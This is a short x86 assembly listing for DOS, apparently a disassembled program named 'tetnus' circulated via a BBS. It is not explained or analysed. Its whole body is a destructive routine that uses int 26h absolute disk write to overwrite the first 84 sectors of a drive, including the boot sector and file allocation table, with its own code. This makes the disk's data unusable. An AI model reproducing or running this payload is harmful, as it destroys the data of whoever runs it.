;��������������������������������������������������������������������������
;
; program entry point
;
;��������������������������������������������������������������������������
tetnus proc far
start:
mov cx,54h
mov dx,0
mov bx,cs
mov ds,bx
mov bx,0
push ax
push bx
push cx
push dx
int 26h ; Absolute disk write, drive al
popf ; Pop flags
pop dx
pop cx
pop bx
pop ax
retn
tetnus endp
seg_a ends
end start
Downloaded From P-80 International Information Systems 304-744-2253